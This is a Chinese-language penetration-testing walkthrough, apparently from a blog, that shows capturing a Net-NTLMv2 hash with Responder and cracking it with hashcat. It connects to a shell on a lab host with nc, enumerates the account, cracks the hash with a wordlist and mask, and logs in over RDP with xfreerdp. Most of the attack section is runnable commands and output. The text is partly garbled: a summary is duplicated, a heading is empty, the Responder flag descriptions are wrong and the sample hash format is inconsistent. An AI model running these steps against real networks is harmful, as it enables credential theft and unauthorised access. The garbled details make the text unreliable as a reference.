1.密码破解
1.1 破解 Windows 哈希实践
**核心攻击场景:**本文介绍第三种:。
Shell / Bash
渗透测试实战:获取并破解 Net-NTLMv2 哈希
介绍渗透测试中获取并破解 Net-NTLMv2 哈希的流程。通过 Netcat 建立 Shell 后收集信息,利用 Responder 诱捕 SMB 认证哈希,再使用 Hashcat 离线破解获得明文密码,最终实现远程登录。涵盖权限维持、凭证捕获及暴力破解等关键安全环节。
介绍渗透测试中获取并破解 Net-NTLMv2 哈希的流程。通过 Netcat 建立 Shell 后收集信息,利用 Responder 诱捕 SMB 认证哈希,再使用 Hashcat 离线破解获得明文密码,最终实现远程登录。涵盖权限维持、凭证捕获及暴力破解等关键安全环节。
**核心攻击场景:**本文介绍第三种:。
| 攻击类型 | 目标哈希 | 手法简介 |
|---|---|---|
| 获取并破解 NTLM 哈希 | 🗝️ NTLM 哈希 | 从内存或 SAM 数据库中提取哈希,并用工具(如 Hashcat)破解 |
| 传递 NTLM 哈希 | 🗝️ NTLM 哈希 | 直接使用哈希进行身份验证,绕过密码需求 |
| 获取并破解 Net-NTLMv2 哈希 | 🔐 Net-NTLMv2 哈希 | 通过中间人或欺骗获取挑战 - 响应包,离线破解 |
| 传递 Net-NTLMv2 哈希 | 🔐 Net-NTLMv2 哈希 | 在支持的环境下复用 Net-NTLMv2 响应进行身份验证 |
# 从 Kali 连接到目标的 4444 端口 nc 192.168.50.211 4444
| 参数 | 说明 |
|---|---|
192.168.50.211 | 目标计算机 FILES01(被攻击目标主机)的 IP 地址 |
4444 | 目标计算机上监听 Shell 的端口号 |
连接前提条件
一旦连接建立,攻击者将获得目标主机的完全交互式 Shell,可执行:
| 操作类型 | 示例命令 | 目的 |
|---|---|---|
| 文件系统操作 | ls, dir, cd, type | 浏览、查看文件 |
| 进程管理 | ps, tasklist, kill | 查看/结束进程 |
| 系统信息 | whoami, hostname, systeminfo | 收集系统情报 |
| 权限提升 | 利用本地漏洞利用程序 | 提升权限 |
| 持久化 | 添加计划任务/服务 | 维持访问 |
①命令 1:whoami - 身份确认
whoami
| 目的 | 输出示例 | 含义 |
|---|---|---|
| 确认当前会话用户 | FILES01\paul | 以域用户"paul"身份运行 |
②命令 2:net user - 权限分析
使用 net user 检查用户 paul 的基本信息,以及所属的组。
net user paul
输出示例:
用户名称 paul
全名 Paul User
注释
用户注释
国家/地区 (默认)
用户属性
账号激活 是
账号到期 从不
上次设置密码 2023/10/01 10:00:00
密码过期 从不
密码可更改 从不
密码必须更改 从不
本地组成员 Administrators
全局组成员 None
...
通过上述信息,可以确认该用户属于本地管理员组,具备较高的权限潜力。接下来我们将尝试获取其凭证哈希。
利用 Responder 工具监听局域网内的广播请求(如 WSD, LLMNR, NBT-NS),当目标主机尝试访问共享资源时,会发送 NTLM 挑战 - 响应包,从而被捕获。
启动 Responder 服务,指定网卡接口(例如 eth0):
sudo responder -I eth0 -wrf
参数说明:
-I: 指定网卡-w: 强制将 HTTP 重定向到 SMB-r: 强制将 HTTP 重定向到 NTLM-f: 忽略代理配置在目标主机上尝试访问一个不存在的共享路径,或者点击诱饵链接(如 \\attacker_ip\share)。
Responder 终端将显示捕获到的哈希信息:
[+] Listening for events...
[+] NTLMv2-SSP Client : 192.168.50.211
[+] NTLMv2-SSP Username : FILES01\paul
[+] NTLMv2-SSP Hash : paul::FILES01:aad3b435b51404eeaad3b435b51404ee:1122334455667788...:...
复制哈希值保存至文件 hash.txt。
使用 Hashcat 进行离线暴力破解。Net-NTLMv2 对应的 Hashcat 模式为 5500。
确保 hash.txt 格式正确,每行一个哈希。
hashcat -m 5500 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
若字典破解失败,可尝试混合模式或规则模式:
hashcat -m 5500 -a 3 hash.txt ?l?l?l?l?l?l?l?l
等待破解完成,Hashcat 会输出明文密码。
获得明文密码后,可使用远程桌面协议连接目标主机。
xfreerdp /u:paul /p:CrackedPassword123 /v:192.168.50.211
成功登录后,即可获取目标系统的完整控制权。
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online
将JSON字符串修饰为友好的可读格式。 在线工具,JSON美化和格式化在线工具,online